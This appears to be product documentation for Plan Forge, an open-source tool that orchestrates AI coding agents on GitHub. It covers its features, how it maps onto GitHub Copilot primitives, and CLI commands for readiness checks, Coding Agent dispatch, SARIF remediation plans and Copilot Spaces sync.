L1 Hub, live WebSocket events · L2 Files, .forge/ append-only audit trail · L3 OpenBrain, pgvector semantic store · cross-team federation (read-only) · bridge-and-flush durability · search_thoughts · brain_recall.
Quality, not just adoption: the half the GitHub Metrics API doesn't cover.
Three frontier models score the same change independently and a reviewer model produces a 0–100 consensus number. Drift from your architecture is measured per commit. RCA outputs become PR proposals, not tickets. Cost is previewed before the run, not after the bill.
Quorum (Claude + GPT + Gemini) · 0–100 LLM-as-judge consensus · forge_drift_report per-commit · forge_health_trend with trajectories · forge_estimate_quorum (cancellable cost preview) · forge_fix_proposal (RCA → PR) · % code by AI · MTTR · drift score.
→ Health DNA · Self-deterministic loop · Dashboard
Audit-grade by default. Approve from your phone. The platform reports its own bugs upstream.
Hooks fire before every deploy and after every slice. Bugs deduplicate themselves. A separate read-only watcher tails any in-flight run. When the harness itself misbehaves, it files a structured bug report against its own upstream, so you're never holding the bag alone on a platform issue.
LiveGuard hooks (preDeploy / postSlice / preAgentHandoff) · Bug Registry with fingerprint dedupe · Incident Capture + MTTR · Audit Loop (scan → triage → spawn-worker fix) · forge_runbook + Deploy Journal · Remote Bridge (Slack / Teams / PagerDuty / Discord / Telegram) · Watcher (read-only by schema) · forge_meta_bug_file self-repair.
→ What is LiveGuard · LiveGuard dashboard · Audit loop · Bug registry · Watcher · Remote bridge
Discipline matters. A platform that tries to own everything ends up owning nothing well. Plan Forge does not:
- Replace github/github-mcp-server: we use it; we ship our own MCP server only for orchestration concerns
If GitHub ships a feature that subsumes a Plan Forge capability, the right answer is to delete the Plan Forge code and use GitHub's. We're explicit about that in the project README.
Plan Forge is MIT-licensed and open source. There's no sales call, no pilot agreement, no license to procure. If you already have GitHub Copilot and GHAS, you have everything you need to evaluate the full stack against your own repos this afternoon.
- Clone github.com/srnichols/plan-forge, run setup.ps1 -Agent claude (or --agent codex / --agent cursor / --agent copilot). Generate Project Principles + initial instruction files via forge_run_skill /onboarding. Wire action.yml into GitHub Actions for PR-time gates. Walk-through: install + first plan.
- Add the Cloud Agent worker (--worker copilot-coding-agent) for async bulk work. LiveGuard hooks if you have a deploy pipeline. The Audit Loop if you want a Coverity-style scan over an existing module. Everything is opt-in.
Cost to evaluate: zero beyond your existing Copilot + GHAS subscription. No new licences, no headcount, no infrastructure, no procurement cycle. Bring your own GHCP partner relationship if you have one; Plan Forge composes on top of whatever Copilot Enterprise tier and support arrangement you already use.
Stuck? File an issue at github.com/srnichols/plan-forge/issues, or open a discussion. Plan Forge ships forge_meta_bug_file precisely so problems with the platform get reported back automatically; you're not on your own.
Architect appendix · supporting context for technical readers
On April 2, 2026, GitHub shipped the Copilot SDK in public preview. The release notes describe it as "the same production-tested agent runtime that powers GitHub Copilot cloud agent and Copilot CLI" exposed for application developers to embed.
The implication is unmistakable:
GitHub views agent orchestration as something built on top of their primitives, not inside them.
This page documents how Plan Forge composes with the primitives GitHub explicitly leaves to the ecosystem.
| Primitive | What it is | Status (May 2026) |
|---|---|---|
| Copilot Cloud Agent (formerly Coding Agent) | Ephemeral Actions-powered runner. Single repo / single branch / single PR per task. Three modes: research-only, plan-only, branch-only | GA |
| AGENTS.md | Open standard for agent context files | Stewarded by Agentic AI Foundation under the Linux Foundation. 60k+ repos use it. GitHub adopts; does not own |
| Agent Skills | Open standard for agent procedural knowledge | Repo agentskills/agentskills, Apache 2.0, maintained by Anthropic. GitHub adopts |
| Model Context Protocol (MCP) | Open standard for agent-to-tool integration | Linux Foundation project. Maintained by Anthropic et al. GitHub ships github/github-mcp-server (29.5k stars, MIT) as the reference implementation |
| .github/instructions/ | GitHub-native repo customization | GA. Plan Forge ships ~18 instruction files |
| .github/copilot-instructions.md | Repo-wide Copilot context | GA |
| .github/agents/ | Custom agent personas | GA on github.com (preview in JetBrains/Eclipse/Xcode) |
| .github/hooks/ | Lifecycle hooks (preToolUse, postToolUse, sessionStart, etc.) | GA |
| .github/skills/ | Repo-scoped skill definitions | GA |
| GitHub Actions | CI/CD runtime that powers Cloud Agent | GA |
| GitHub Advanced Security (GHAS) | Code scanning, secret scanning, Dependabot | GA |
| Copilot Spaces | Curated context bundles for chat | GA (chat-side; not yet a Cloud Agent execution context) |
| Copilot Metrics API | Adoption + flow metrics (active users, PR throughput, time-to-merge) | GA |
| Copilot SDK | Embed the Cloud Agent runtime in your own app | Public preview, April 2, 2026 |
| Custom properties | Org-level governance primitive | GA |
| Org runner controls + firewall | Cloud Agent runtime governance | GA (April 2026) |
This is a strong, coherent substrate. It is also explicitly just the substrate.
These are the surfaces GitHub does not ship and shows no sign of shipping, with direct evidence from GitHub's own docs and roadmap:
| Gap | Evidence |
|---|---|
| Hardened plan as versioned artifact with scope contract, slices, validation gates, drift detection | Plan-mode is session-scoped one-shot; no plan file format, no scope contract, no slice persistence |
| Cross-repo / multi-service orchestration | Explicit single-repo limitation: "Copilot can only make changes in the repository specified when you start a task. Copilot cannot make changes across multiple repositories in one run." |
| Multi-model quorum / consensus per task | No built-in mechanism. Single model per session |
| Plan execution harness with per-slice gates and resume-from semantics | copilot-setup-steps.yml is one pre-flight hook; nothing slice-aware |
| Semantic eval harness (test pass rate, regression rate, plan-adherence) | Metrics API explicitly does not measure quality, only adoption + flow |
| Cost prediction per task / per plan before execution | Only post-hoc Actions + premium-request totals |
| Live programmatic watch of an in-flight agent from external tools | Session UI is in-product only; no public stream |
| Cross-org / cross-team fleet console with queue, capacity, SLA visibility | Only per-issue / per-project session UI |
| Pre-merge plan-adherence gates | No first-party concept of "this PR drifted from the approved plan" |
| Agent skills / instructions sync across N repos | Up to consumer (.github-private is the only template mechanism) |
| Multi-tenant cost budgets and prioritization | Not in product |
| A/B comparison of custom agents or models for the same task class | Not in product |
| Cross-team / cross-project semantic memory so lessons compound across pilots | Copilot Spaces is chat-side and repo-scoped; no semantic recall across teams or sessions |
| Closed-loop RCA → fix-proposal → validate-fix pipeline | @copilot on issues + GHAS Autofix are open-loop point features; no native bug registry, no multi-model RCA, no fix validation cycle |
| Coverity-style scan → triage → spawn-worker → fix loop for AI-generated drift | GHAS scans + Autofix on findings only; nothing that spawns a worker per finding and iterates to convergence |
| Deploy-aware lifecycle hooks (preDeploy / postSlice / preAgentHandoff) with severity gates | Existing hooks (preToolUse / postToolUse / sessionStart) are session-scoped; nothing fires before deploys with severity blocking |
| Idea → hardened-plan interview funnel with lane-scoped Q&A | Plan-mode is single-shot session output; no interview funnel, no lane classification, no progressive refinement |
| Pre-flight plan-quality scorer (scope-contract clarity, slice sizing, gate strength, forbidden-actions) | Nothing in product scores plan quality before execution |
| Specialized reviewer agent fleet (20+ read-only personas: arch / security / db / perf / a11y / multi-tenancy / CI-CD / compliance / dependency / observability) | Copilot Code Review is singular and chat-prompted; no first-party persona library |
| Remote-bridge approval flows with resume-on-approve (Slack / Teams / PagerDuty / Telegram / Discord) | GitHub notifications fire one-way; no inline-approve → resume-paused-slice flow |
| Deploy Journal + auto-generated runbook per plan | No first-party concept of "audit record per deploy" or "runbook from this plan" |
| … and more. The full capability index lives in the quick reference and the manual book index. | |
GitHub's positioning is consistent: wrap your tool/data source as an MCP server, layer your customization via the open file standards (AGENTS.md, Skills, instructions), and build your orchestration on top of the SDK. That is exactly the Plan Forge architecture.
A 16-row reference for architects mapping each GitHub-native primitive to the Plan Forge surface that consumes it.
| GitHub primitive | How Plan Forge consumes it | Where in Plan Forge |
|---|---|---|
| Copilot Cloud Agent | Plan Forge dispatches plan slices to CCA via gh issue create --assignee @copilot. Trajectories captured to .forge/trajectories/<plan-slug>.jsonl | pforge-mcp/orchestrator.mjs (--worker copilot-coding-agent mode) |
| AGENTS.md | Plan Forge generates and maintains AGENTS.md alongside .github/copilot-instructions.md so any AGENTS.md-aware agent (Claude Code, Cursor, Codex, Amp, Aider, Gemini CLI, Goose, Windsurf) consumes Plan Forge context | pforge-mcp/server.mjs setup phase |
| .github/instructions/ | Plan Forge ships ~18 instruction files covering architecture, security, testing, database, API, auth, error handling, deployment, performance, observability, version, status reporting, context fuel, self-repair, plan hardening | templates/.github/instructions/ |
| .github/copilot-instructions.md | Plan Forge generates the project-scoped Copilot instructions during setup.ps1 / setup.sh | setup.ps1, setup.sh |
| .github/agents/ | Plan Forge ships 20 custom agent personas (architecture, database, security, deploy, performance, test-runner, API contracts, accessibility, multi-tenancy, CI/CD, observability, dependency, compliance, plus 6 pipeline agents and an audit classifier) | templates/.github/agents/ |
| .github/hooks/ | Plan Forge ships its own lifecycle hooks: PreDeploy, PreCommit, PreAgentHandoff, PostSlice, plus plan-forge.json hook configuration. Distinct from Claude Code's hook names. | templates/.github/hooks/ |
| .github/skills/ | Plan Forge ships 11 skills as / slash-commands: database-migration, staging-deploy, test-sweep, dependency-audit, security-audit, code-review, release-notes, api-doc-gen, onboarding, health-check, forge-execute, audit-loop, plus pipeline skills | templates/.github/skills/ |
| MCP | Plan Forge ships its own MCP server (pforge-mcp) with 102 tools covering planning, execution, eval, observability, cost, memory, search, timeline, notifications. Auto-generates .vscode/mcp.json | pforge-mcp/server.mjs, pforge-mcp/tools.json |
| github/github-mcp-server | Plan Forge documents this as the canonical GitHub-side MCP integration. Plan Forge agents call it via the MCP plumbing they already speak | docs reference, .vscode/mcp.json example |
| GitHub Actions | Plan Forge plans can run as Actions workflows; pforge run-plan is callable from any runner. CCA itself runs in Actions and Plan Forge plans dispatched via CCA inherit Actions concurrency, runners, and minutes | action.yml |
| GitHub Advanced Security | Plan Forge's forge_secret_scan, forge_dep_watch, and security-audit skill complement GHAS, not replace it. Plan Forge surfaces GHAS findings into plan-aware bug reports | pforge-mcp/notifications/, dependency-reviewer.agent.md |
| Copilot Spaces | Plan Forge plan files + Scope Contract are the equivalent concept for autonomous execution. Spaces serves chat-side context curation; Plan Forge serves execution-time scope binding | docs reference |
| Copilot Metrics API | Plan Forge does not duplicate it. Plan Forge surfaces quality metrics (gate failure rates, drift scores, plan-adherence, regressions caught at gate boundary, cost per merged PR) that the Metrics API explicitly does not | forge_health_trend, forge_drift_report, forge_cost_report |
| Copilot SDK | Plan Forge does not embed the Copilot runtime. Plan Forge orchestrates across multiple agent runtimes (CCA, Claude Code, Codex, custom workers). The SDK is the right tool when you want to embed a single agent in your app; Plan Forge is the right tool when you want to coordinate many agent runs as a delivery pipeline | architecture reference |
| Custom properties | Plan Forge documents the recommended custom-property schema for governing per-team Plan Forge enablement, plan templates, and budget caps | templates/docs/CUSTOMIZATION.md |
| Org runner controls | Plan Forge dispatched plans inherit the org's runner policy. No conflict, no override needed | docs reference |
If your strategic direction is "consolidate on GitHub Enterprise + Copilot Enterprise," Plan Forge reinforces that choice rather than competing with it.
For Microsoft-shop enterprises pursuing the GitHub-native consolidation thesis, this is the cleanest path: GitHub for the substrate, Plan Forge for the orchestration layer, no third vendor in the picture.
For customers using Microsoft Foundry (Azure OpenAI, Foundry Agent Service, Foundry Toolboxes), Plan Forge composes additionally with:
https://{resource}.openai.azure.com/openai/v1/. Customer configures deployment names, not model families.
.vscode/mcp.json at a Foundry Toolbox endpoint is config, not code.
See Reference Architecture: Microsoft Foundry variant for the full picture.

A tour of the GitHub-native primitives Plan Forge integrates with, plus the readiness check for your repo.
When to read this chapter: you are running (or considering) Plan Forge against a repository hosted on GitHub, with GitHub Copilot, Copilot Coding Agent, GHAS, or Copilot Spaces in the picture.
When to skip it: you are on Bitbucket, GitLab, Azure DevOps, or anywhere else. None of this is required by Plan Forge; see Appendix C: Stack-Specific Notes for language-preset details and Chapter 12: Extensions for the OSS extension surface.
Looking for the strategic framing instead? See Appendix H — GitHub Stack Alignment for the four-band AI SDLC stack diagram, the four harness pillars in plain English, the six outcome KPIs, and the consolidation thesis. This appendix (I) is the surface-by-surface technical reference; H is the executive-level companion.
Plan Forge does not require GitHub. It runs against any repo, with any agent (Copilot, Claude Code, Cursor, Codex), and against any CI system. But when the repo is on GitHub, Plan Forge has its deepest stack of integrations: eight first-class primitives it consumes today, plus several it dispatches to. This appendix is the single canonical reference for that integration surface.
Section 1 is the readiness check, a one-command snapshot of which GitHub primitives your repo currently has wired up. Section 2 is the surface-by-surface tour. Sections 3 (Copilot Coding Agent dispatch), 4 (GHAS remediation chains), 5 (Copilot Spaces sync), 6 (Metrics API leaderboard), 7 (BYOK and the multi-model picker), and 8 (other agent platforms: Claude Code, Cursor, Codex) are now live.
pforge github status
The fastest way to know which GitHub-native primitives Plan Forge can use against your repo is the introspection command:
pforge github status
Output is a checklist of the eight default checks, each marked with a glyph:
Sample output, run against the Plan Forge repository itself:
GitHub stack readiness, E:\GitHub\Plan Forge
────────────────────────────────────────────────────────────────────────
✓ .github/copilot-instructions.md
present
⚠ AGENTS.md
missing, open agent standard not adopted
✓ .github/instructions/*.instructions.md
7 instruction files found
✓ .github/prompts/*.prompt.md
8 prompt files found
✓ .vscode/mcp.json
Plan Forge MCP server registered
✓ .github/workflows/
4 workflow files found
✓ git remote → github.com
github.com remote configured
✓ gh CLI on PATH
gh CLI available
────────────────────────────────────────────────────────────────────────
7 pass · 1 warn · 0 fail · 0 n/a (8 checks)
And against the Plan Forge testbed (a sample repo set up via setup.ps1):
pforge github status against the Plan Forge testbed, generated by scripts/capture-github-status-screenshot.mjs.
To get fix hints for every ⚠ and ✗ row, use the doctor subcommand:
pforge github doctor
For machine-readable output (e.g. piping into a dashboard or another tool), add --json:
pforge github status --json
The JSON shape is stable and documented in the MCP Server Reference under forge_github_status. Two extra SHOULD-tier checks (instruction-file applyTo: usage, copilot-instructions length) run when you add --extra.
| Code | Meaning |
|---|---|
| 0 | No ✗ fail rows. Warns and N/A are allowed. |
| 1 | At least one ✗ fail row. |
| 2 | Invalid arguments to the CLI. |
This makes the command CI-friendly: a workflow can fail-fast on missing primitives, or treat warnings as advisory only.
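A CI wrapper might branch on these exit codes roughly as follows. This is a minimal sketch: the function name `classifyExit` and the returned labels are illustrative and not part of Plan Forge; only the three exit codes come from the table above.

```javascript
// Hypothetical helper: maps the documented exit codes of
// `pforge github status` to a CI decision. Labels are illustrative.
function classifyExit(code) {
  switch (code) {
    case 0:
      return { ok: true, reason: "no fail rows (warnings and n/a allowed)" };
    case 1:
      return { ok: false, reason: "at least one fail row" };
    case 2:
      return { ok: false, reason: "invalid CLI arguments" };
    default:
      // Anything else is outside the documented contract.
      return { ok: false, reason: `undocumented exit code ${code}` };
  }
}

console.log(classifyExit(0).ok); // true
console.log(classifyExit(1).reason);
```

Treating undocumented codes as failures keeps the wrapper conservative if the command is killed or crashes.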
The same checklist is exposed as the forge_github_status MCP tool. From an in-IDE chat:
"Run
forge_github_status on this repo and tell me which GitHub primitives I'm missing."
The agent receives the structured JSON and can answer with line-level precision, useful when you're evaluating Plan Forge inside an existing repo and don't want to leave the IDE.
Each row below is one check from pforge github status. The "What Plan Forge does with it" column is what makes this chapter different from the GitHub docs: it tells you exactly how Plan Forge uses the primitive, and which Plan Forge feature stops working if you remove it.
| Primitive | What it is | What Plan Forge does with it |
|---|---|---|
| .github/copilot-instructions.md | Repo-wide context Copilot Chat reads on every conversation. | Generated by setup.ps1 / setup.sh. Plan Forge writes the project overview, architecture summary, quick-command reference, and pipeline reference here. Re-generated by pforge update while preserving customizations. |
| AGENTS.md | Open standard adopted by Cursor, Codex, OpenAI, Anthropic, and GitHub for cross-agent context. | Generated alongside copilot-instructions.md. Lets Plan Forge support BYOK, the same context surface works whether the user picks Copilot, Cursor, Claude Code, or Codex. |
| .github/instructions/*.instructions.md | Path-scoped Copilot instructions (each file's applyTo: frontmatter targets a glob). | Plan Forge ships ~17 instruction files: architecture-principles, git-workflow, testing, security, database, etc. Each auto-loads when Copilot edits a matching file. The Step-2 Plan Hardener and Step-5 Reviewer reference these directly. |
| .github/prompts/*.prompt.md | Reusable prompt files Copilot Chat can invoke as slash commands. | Plan Forge ships the pipeline prompts: step0-specify-feature, step1-preflight-check, step2-harden-plan, step3-execute-slice, step4-completeness-sweep, step5-review-gate. The full Plan Forge pipeline runs through these in sequence. |
| .vscode/mcp.json | VS Code's MCP-server registry. Each entry exposes a server's tools to Copilot Chat. | Plan Forge registers itself here as plan-forge, exposing 102 MCP tools (forge_run_plan, forge_estimate_quorum, forge_cost_report, forge_github_status, forge_lattice_query, forge_sync_memories, …). See MCP Server Quick Start. |
| .github/workflows/ | GitHub Actions, the CI surface. | Validation gates from Plan Forge plans can run as GitHub Actions jobs. The regression-guard command is designed to be triggered from a workflow on every PR. A future release will add an Actions composite for one-step Plan Forge dispatch. |
| git remote → github.com | Repository hosted on GitHub. | Pre-requisite for everything in Sections 3+: Copilot Coding Agent dispatch (creates issues + PRs against the repo), GHAS API access, Spaces sync, Metrics API ingestion. Without a github.com remote those features have no target. |
| GitHub CLI (gh) | GitHub's official command-line tool for issues, PRs, releases, and GHAS. | Plan Forge prefers gh for any GitHub API operation when it's installed (auth is already handled). Strict requirement for the SARIF ingestion command and for one-shot issue creation in pforge run-plan --worker copilot-coding-agent. |
A note on optionality: not having every row green does not break Plan Forge. It limits which Plan Forge features are available. The CLI still runs end-to-end against any repo with any agent; the GitHub primitives give you the deepest, most automated path.
When your repo is hosted on GitHub and has Copilot Coding Agent enabled, Plan Forge can hand each slice of a plan off to the Coding Agent automatically, creating a GitHub Issue per slice, assigning it to @copilot, polling the resulting PR, and capturing the run trajectory back into the Plan Forge dashboard.
pforge run-plan --worker copilot-coding-agent docs/plans/my-feature-PLAN.md
The --worker copilot-coding-agent flag replaces the default in-process execution loop with the GitHub dispatch loop. Every other flag (--quorum, --estimate, --resume-from) works unchanged.
Each slice becomes a GitHub Issue. The body is assembled from two sources:
- Canonical block: produced by pforge-mcp/coding-agent-dispatch.mjs.
- Per-stack block: included only when .github/instructions/project-profile.instructions.md exists. Appends the project's language, framework, test runner, and any Forbidden Actions so the Coding Agent has immediate context without reading the full plan.
If project-profile.instructions.md is absent, the per-stack block is silently omitted. You can inspect the issue body before creating it:
pforge run-plan --worker copilot-coding-agent --dry-run docs/plans/my-feature-PLAN.md
The --dry-run flag prints the would-be issue body for each slice and exits without touching GitHub.
After creating the issue and assigning it to @copilot, Plan Forge polls for the resulting PR. It uses a two-stage fallback:
| Stage | Strategy | How it works |
|---|---|---|
| 1 (primary) | Linked-issue search | gh pr list --search "closes #<issue-number>", matches PRs that reference the issue in their body. Works reliably when the Coding Agent follows GitHub's "closes" keyword convention. |
| 2 (fallback) | Branch pattern | Scans open PRs whose branch name contains copilot/ or the slugified slice title. Used when the agent opens a PR without a closes link (rare, but observed in edge cases). |
If neither stage finds a PR within the configured timeout (default: 30 minutes, configurable via .forge.json#codingAgent.pollTimeoutMinutes), the slice is marked stalled and Plan Forge moves to the next slice or stops, depending on --on-stall (skip | abort, default abort).
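The two-stage lookup can be sketched as a pure function over a list of open PRs. Everything named here is an assumption made for illustration: `findSlicePr`, `slugify`, and the `{ number, body, branch }` PR shape are not Plan Forge internals, and the real slug rules may differ.

```javascript
// Illustrative only: `slugify`, `findSlicePr`, and the PR object shape
// ({ number, body, branch }) are assumptions, not Plan Forge internals.
function slugify(title) {
  return title
    .toLowerCase()
    .replace(/[^a-z0-9]+/g, "-")
    .replace(/^-+|-+$/g, "");
}

function findSlicePr(openPrs, issueNumber, sliceTitle) {
  // Stage 1: a PR whose body references the issue with "closes #N".
  const closes = new RegExp(`closes\\s+#${issueNumber}\\b`, "i");
  const linked = openPrs.find((pr) => closes.test(pr.body || ""));
  if (linked) return { pr: linked, stage: 1 };

  // Stage 2: branch name contains "copilot/" or the slugified slice title.
  const slug = slugify(sliceTitle);
  const byBranch = openPrs.find(
    (pr) => pr.branch.includes("copilot/") || (slug && pr.branch.includes(slug))
  );
  if (byBranch) return { pr: byBranch, stage: 2 };

  // No match yet: the caller keeps polling until the timeout elapses.
  return null;
}
```

Returning the stage alongside the PR makes it easy to log which strategy matched, which helps when tuning the fallback.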
When a PR is merged, Plan Forge fetches the Coding Agent's session log from the PR's Copilot Activity tab via the GitHub API and appends it to the plan's trajectory file at .forge/trajectories/<plan-slug>.jsonl. This makes the Coding Agent's reasoning searchable by pforge timeline and forge_master_ask just like any other execution session.
Before Plan Forge creates any GitHub Issues for a --worker copilot-coding-agent run, it executes a pre-flight check that includes the copilot-coding-agent-assignable probe. This probe calls the GitHub Assignees API to verify that @copilot is an assignable user on the repository. If it is not, typically because Copilot Coding Agent has not been enabled at the org or repo level, the orchestrator stops immediately with a fix-hint rather than creating issues that will never be picked up.
The probe has three return states:
| Status | Meaning | Action taken by orchestrator |
|---|---|---|
| pass | @copilot is assignable on this repo, Copilot Coding Agent is enabled and ready. | Pre-flight continues; slice execution proceeds normally. |
| warn | Copilot Coding Agent is not enabled, --assignee @copilot would be silently dropped. | Promoted to a hard fail. Execution stops before any issue is created. Fix-hint links to GitHub's docs for enabling Copilot Coding Agent at the repo or org level. |
| fail | API error, token lacks repo scope, network unreachable, or GitHub returned 4xx/5xx. | Execution stops. Fix-hint describes the token scope requirement and suggests gh auth status. |
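The decision table above reduces to a small mapping. This is a sketch only: the function name `preflightAction` and its return shape are hypothetical, and the hint strings paraphrase the table rather than quote real Plan Forge output.

```javascript
// Sketch of the decision table above. The function name and return shape
// are hypothetical; the three status values come from the table.
function preflightAction(probeStatus) {
  switch (probeStatus) {
    case "pass":
      return { proceed: true, hint: null };
    case "warn":
      // Promoted to a hard fail: the assignee would be silently dropped.
      return { proceed: false, hint: "enable Copilot Coding Agent for the repo or org" };
    case "fail":
      return { proceed: false, hint: "check token scope; run `gh auth status`" };
    default:
      throw new Error(`unexpected probe status: ${probeStatus}`);
  }
}
```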
You can run the probe manually via pforge github status with --gh-token:
pforge github status --gh-token
Without --gh-token, the check returns na ("skipped, pass --gh-token to probe") and does not make any API calls. The probe is intentionally opt-in on the status command to keep the hot path free of network I/O, but it always runs automatically when the orchestrator's pre-flight fires for a --worker copilot-coding-agent dispatch.
Prerequisite: gh CLI must be authenticated (gh auth status) and the repo must have Copilot Coding Agent enabled at the org or repo level. Run pforge github status --gh-token; all checks, including copilot-coding-agent-assignable, should pass before using --worker copilot-coding-agent.
GitHub Advanced Security (GHAS) surfaces security findings (CodeQL alerts, secret scans, Dependabot advisories) as SARIF files or API responses. pforge plan-from-sarif turns a SARIF result into a runnable Plan Forge plan with one slice per finding, severity-ordered so the highest-severity issues execute first.
pforge plan-from-sarif codeql-results.sarif --out docs/plans/ghas-remediation-PLAN.md
The generated plan is a standard Plan Forge plan. Run it with any worker (pforge run-plan, --worker copilot-coding-agent, etc.) and all the usual flags apply.
Pass - as the file argument to read SARIF from stdin. This lets you pipe directly from gh or any SARIF producer without writing an intermediate file:
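# Pipe the most recent CodeQL analysis from the GitHub API as SARIF.
# The analyses list is returned newest-first; SARIF is selected via the Accept header.
ANALYSIS_ID=$(gh api "/repos/{owner}/{repo}/code-scanning/analyses?per_page=1" --jq '.[0].id')
gh api -H "Accept: application/sarif+json" "/repos/{owner}/{repo}/code-scanning/analyses/${ANALYSIS_ID}" | \
pforge plan-from-sarif - --out docs/plans/ghas-remediation-PLAN.md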
# Or from a local CodeQL database run
codeql database analyze my-db --format=sarifv2.1.0 --output=- | \
pforge plan-from-sarif - --out docs/plans/ghas-remediation-PLAN.md
Findings are sorted by SARIF level in descending order, error → warning → note, then by rule ID for deterministic ordering within a level. Each finding becomes one slice with:
[SARIF] <ruleId>, <location>
Use --min-severity warning to exclude note-level findings from the plan. Use --rule-filter <ruleId> to include only a specific rule. Both flags can be combined.
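The ordering and filtering rules can be sketched as follows. This is an illustration under stated assumptions: `orderFindings` is a hypothetical helper, findings are reduced to `{ ruleId, level }` objects, and levels other than the three named above are simply dropped.

```javascript
// Rank for each SARIF level; higher runs first. Findings are plain objects
// here ({ ruleId, level }); real SARIF results carry more fields.
const LEVEL_RANK = { error: 3, warning: 2, note: 1 };

// Hypothetical helper mirroring --min-severity and --rule-filter.
// Levels outside the three above are dropped in this sketch.
function orderFindings(findings, { minSeverity = "note", ruleFilter = null } = {}) {
  const floor = LEVEL_RANK[minSeverity];
  return findings
    .filter((f) => LEVEL_RANK[f.level] >= floor)
    .filter((f) => ruleFilter === null || f.ruleId === ruleFilter)
    .sort((a, b) => {
      // Severity descending, then rule ID ascending for a stable order.
      const bySeverity = LEVEL_RANK[b.level] - LEVEL_RANK[a.level];
      if (bySeverity !== 0) return bySeverity;
      return a.ruleId < b.ruleId ? -1 : a.ruleId > b.ruleId ? 1 : 0;
    });
}
```

Comparing rule IDs with plain string operators rather than a locale-aware comparison keeps the order identical across machines.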
pforge plan-from-sarif is the inbound half of the GHAS integration. The outbound half is the existing PreDeploy LiveGuard hook: before any deploy slice executes, forge_secret_scan + forge_env_diff run automatically and block on severity ≥ high. The /security-audit skill combines both: it invokes pforge plan-from-sarif against the latest SARIF, presents the generated plan for review, then hands off to pforge run-plan.
"Run
/security-audit and generate a remediation plan for all high-severity CodeQL findings."
That one prompt triggers the full pipeline: SARIF fetch → plan generation → plan review → optional execution. See the Skills Reference for the full /security-audit flow.
Copilot Spaces is GitHub's team-scoped knowledge hub, a curated collection of files, instructions, and context that Copilot Chat draws from automatically when a Space is selected. Plan Forge integrates with Spaces via pforge sync-spaces: a single command that pushes the active plan, instruction files, and Plan Forge tool catalog into a designated Space, giving every chat session in the org instant access to the current plan state without manual copy-paste.
pforge sync-spaces
By default this targets the Space named plan-forge in the same org as the repo's git remote. Override with --space <owner/name>. For org-wide broadcast, use --org <slug> to push to every Space in the org that has the plan-forge-sync topic tag.
pforge sync-spaces builds a payload from four sources and uploads them as versioned Space files:
| Source | Space path | Update frequency |
|---|---|---|
| Active plan file (the one matching .forge/active-plan) | plan-forge/active-plan.md | Every sync |
| All .github/instructions/*.instructions.md files | plan-forge/instructions/<name>.md | Only when file hash changes |
| MCP tool catalog (forge_capabilities snapshot) | plan-forge/tool-catalog.md | Only when version changes |
| Project profile (.github/instructions/project-profile.instructions.md if present) | plan-forge/project-profile.md | Only when file hash changes |
Files are uploaded using the GitHub Spaces API, authenticated via the gh CLI; run gh auth status before your first sync. Unchanged files (same SHA-256) are skipped to stay within API rate limits.
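The hash-based skip for the hash-tracked rows can be sketched like this. The names `planUploads` and `remoteHashes` are hypothetical, and how Plan Forge actually records the last-uploaded hash is not described here; the sketch assumes a simple path-to-hash map.

```javascript
const { createHash } = require("node:crypto");

// Hex SHA-256 of a file's content.
function sha256(content) {
  return createHash("sha256").update(content).digest("hex");
}

// Hypothetical planner: `remoteHashes` maps Space path -> hash of the last
// uploaded version; `localFiles` maps Space path -> current content.
function planUploads(localFiles, remoteHashes, { force = false } = {}) {
  const upload = [];
  const skip = [];
  for (const [path, content] of Object.entries(localFiles)) {
    const unchanged = remoteHashes[path] === sha256(content);
    // force mirrors the --force flag: re-upload even when hashes match.
    (unchanged && !force ? skip : upload).push(path);
  }
  return { upload, skip };
}
```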
| Flag | Default | Effect |
|---|---|---|
--space <owner/name> | Inferred from remote + .forge.json | Target a specific Space by owner and name. |
--org <slug> | (single repo Space) | Broadcast to all Spaces in the org tagged plan-forge-sync. |
--dry-run | (off) | Print what would be uploaded without making API calls. |
--force | (off) | Re-upload all files even if SHA-256 matches. |
--no-instructions | (instructions included) | Skip the .github/instructions/ payload. Useful when the Space already has a curated instruction set you don't want overwritten. |
Many enterprise readouts describe an "AI-SDLC-Hub", a single Space that every developer in the org selects by default, giving all Copilot Chat sessions a shared view of the team's architecture decisions, coding standards, and active delivery plan. pforge sync-spaces is the automation layer for that pattern: instead of a human curating the Space manually, the hub is kept current by a scheduled CI job or a post-commit hook.
A minimal GitHub Actions workflow to sync on every push to main:
name: Plan Forge Spaces Sync
on:
  push:
    branches: [main]
    paths:
      - 'docs/plans/**'
      - '.github/instructions/**'
      - '.forge.json'
jobs:
  sync:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - uses: actions/setup-node@v4
        with: { node-version: '20' }
      - run: npm install -g plan-forge
      - run: pforge sync-spaces --space ${{ vars.PFORGE_SPACES_TARGET }}
        env:
          GH_TOKEN: ${{ secrets.PFORGE_SPACES_TOKEN }}
Store the target Space name as a repository variable (PFORGE_SPACES_TARGET) and the gh-compatible token as a secret. The token needs copilot_spaces:write scope.
To avoid specifying --space on every invocation, write the target into .forge.json:
{
  "github": {
    "spacesTarget": "acme-org/plan-forge-hub"
  }
}
pforge sync-spaces reads this field and uses it as the default target. The field can also be set via the CLI:
pforge config set github.spacesTarget acme-org/plan-forge-hub
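Taken together, the target can come from three places. The sketch below shows one plausible resolution order (flag, then .forge.json, then the plan-forge Space in the remote's org); that order is inferred from the text above, not confirmed behavior, and `resolveSpaceTarget` is a hypothetical name.

```javascript
// Hypothetical resolver; the precedence (flag, then .forge.json, then the
// `plan-forge` Space in the remote's org) is inferred from the text above.
function resolveSpaceTarget({ spaceFlag, forgeConfig, remoteOrg }) {
  if (spaceFlag) return spaceFlag;
  const configured =
    forgeConfig && forgeConfig.github && forgeConfig.github.spacesTarget;
  if (configured) return configured;
  if (remoteOrg) return `${remoteOrg}/plan-forge`;
  throw new Error("no Space target: pass --space or set github.spacesTarget");
}
```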
The current release ships the core sync path: plan, instructions, tool catalog, and project profile. A future release will add bidirectional sync, pulling conversation summaries and noteworthy Q&A threads from the Space back into the Plan Forge timeline so decision rationale captured in chat is preserved alongside the plan execution history. The pforge github status readiness check will also gain a dedicated Spaces row at that point.
Prerequisite: gh CLI must be authenticated (gh auth status) and the target Copilot Space must exist before the first sync. Create a Space at github.com/copilot/spaces and note the owner/name slug. Run pforge github status to verify the rest of the GitHub stack readiness.
The Copilot Metrics API (available at the org and enterprise level via gh api /orgs/{org}/copilot/metrics) surfaces AI-assisted PR rate, code-suggestion acceptance, and code-review usage across your teams. Plan Forge pulls that data alongside its own plan-execution metrics (slices shipped, MTTR, drift rate) and presents them in a single leaderboard view on the dashboard.
